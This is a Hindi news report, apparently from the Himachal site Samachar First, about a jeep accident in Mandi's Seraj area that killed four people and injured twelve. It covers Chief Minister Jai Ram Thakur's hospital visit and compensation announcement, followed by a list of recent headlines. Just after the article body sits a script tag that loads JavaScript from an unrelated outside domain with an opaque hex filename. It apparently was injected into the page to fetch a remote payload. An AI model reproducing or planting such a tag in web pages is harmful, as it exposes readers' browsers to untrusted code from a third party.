Categories: हिमाचल

मंडी जीप हादसे में अस्पताल जाकर मुख्यमंत्री जयराम ठाकुर ने जाना घायलों का कुशलक्षेम

<p>जिला मंडी में सराज के कहल्हणी में बड़े हादसे में अब तक 4 लोगों की मौत की पुष्टि है जबकि 12 लोगों के घायल होने की जानकारी है।&nbsp; सीएमओ मंडी डॉ. देवेंद्र शर्मा ने जानकारी देते हुए कहा कि अभी तक सिर्फ तीन लोगों की मौत हुई थी लेकिन एक व्यक्ति ने इलाज के दौरान दम तोड़ दिया। कुछ घायलों का कल्हणी मंडी में इलाज चल रहा है।</p>

<p>सीएम जयराम ठाकुर आज सुबह बालीचैकी जाने से पहले जोनल अस्पताल मंडी दौरे पर आए और उपचाराधीन घायलों का हालचाल पूछा। इस दौरान मुख्यमंत्री ने कहा कि मृतकों के परिजनों को चार-चार लाख और घायलों का मुफ्त ईलाज होगा। उन्होंने राज्य सरकार की तरफ से मृतकों के परिजनों के लिए मदद का ऐलान किया। उन्होंने कहा कि हादसे में कोई लापरवाही नहीं हुई है। बल्कि ये हादसा मलबा गिरने के कारण हुआ है।</p>

<p>अब तक इस हादसे में चार लोगों की दुखद मौत हो चुकी है। तीन ने मौके पर तो एक ने इलाज के दौरान मंडी में दम तोड़ा। इसके अलावा एक घायल को इलाज के लिए आईजीएमसी शिमला रैफर किया गया है। बाकी 10 घायलों का जोनल अस्पताल मंडी में इलाज चल रहा है। यहां उपचाराधीन घायलों की हालत स्थिर बताई जा रही है। आज शवों के पोस्टमार्टम करवाकर परिजनों के हवाले किए जाएंगे। इसके बाद मुख्यमंत्री जयराम ठाकुर बालीचैकी में उद्वोग विभाग के कार्यक्रम में शिरकत करनेके लिए रवाना हो गए।</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>

Samachar First

Recent Posts

विक्रमादित्य की चेतावनी: कंगना माफी मांगें, वरना मानहानि का सामना करें

  Shimla: मंडी से सांसद कंगना रनौत के बयान पर मंत्री विक्रमादित्य सिंह पलटवार किया…

2 hours ago

सामान्य से 3.2 डिग्री अधिक तापमान, 26 तारीख से बारिश की उम्मीद

  Shimla: प्रदेश में बीते 3 दिन से सूरज चमक रहा है। इससे सितंबर माह…

3 hours ago

शिमला-बिलासपुर हाईवे पर भूस्खलन, यातायात प्रभावित

Solan: शिमला-बिलासपुर राष्ट्रीय राजमार्ग-205 पर दाड़लाघाट के कराड़ाघाट के समीप साफ मौसम में ही पहाड़ी…

4 hours ago

PCC Meeting: सीएम की उपस्थिति पर संशय, डिप्टी सीएम नहीं होंगे

Shimla:कांग्रेस अध्यक्ष प्रतिभा सिंह ने प्रदेश कांग्रेस कमेटी कुछ ही देर में कांग्रेस भवन में…

4 hours ago

शिमला में छुट्टियां बीताकर सोनिया और राहुल लौटे, अब दिल्ली की राह

Shimla: हिमाचल की राजधानी शिमला के मशोबरा में छुट्टियां बीताकर आज सुबह सोनिया गांधी और…

4 hours ago

सितम्बर 23 का राशिफल, क्या कहती हैं आपकी राशि?

आज का राशिफल 23 सितम्बर 2024 , सोमवार मेष🐐 (चू, चे, चो, ला, ली, लू,…

5 hours ago